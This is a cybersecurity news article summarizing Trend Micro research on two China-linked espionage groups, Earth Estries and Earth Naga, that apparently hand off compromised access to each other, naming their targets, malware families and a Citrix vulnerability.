China-linked advanced persistent threat (APT) groups are joining efforts bringing cyber espionage to a new level of coordination in what Trend Micro Research describes as “Premier Pass-as-a-Service” trend, where multiple APT groups share information and resources, making it harder to attribute the attack.
In particular, Trend Micro has observed such collaboration between two China-linked groups: Earth Estries and Earth Naga (also known as Flax Typhoon, RedJuliett, or Ethereal Panda). According to the researchers, Earth Estries handed over hacked systems to Earth Naga, meaning what first looked like one attack was actually a coordinated handoff between the two groups.
Earth Estries has mainly targeted telecommunications and government sectors in the US, Asia-Pacific, and the Middle East, and has recently expanded into South America and South Africa. Earth Naga, active since at least 2021, focuses on government, military, technology, and academic organizations, especially in Taiwan, but also targets NATO and Latin American countries.
Trend Micro believes Earth Estries may act as an access broker, breaking into systems and then giving that access to other groups. More specifically, in a November 2024 breach of a mobile retailer in Asia-Pacific and a March 2025 hack of a Southeast Asian government agency, Earth Estries appeared to provide entry points that Earth Naga later used.
The 2025 incident involved multiple malware types, including CrowDoor, ShadowPad, Cobalt Strike, and Draculoader, as well as remote tools like AnyDesk and EarthWorm to hide activity. Trend Micro says it found evidence that both groups shared infrastructure and possibly coordinated their operations.
Later in 2025, Earth Estries was also seen exploiting a Citrix flaw (CVE-2025-5777) and continuing attacks on network devices from Ivanti, Cisco, and others.
“The threat landscape is increasingly shaped by sophisticated, multi-group intrusions, as demonstrated by the collaborative operations between Earth Estries and Earth Naga. Defenders must adopt vigilant and multi-layered security strategies to counter risks such as suspicious file deployments, unauthorized remote administration, and targeted attacks on edge devices,” Trend Micro researchers noted.
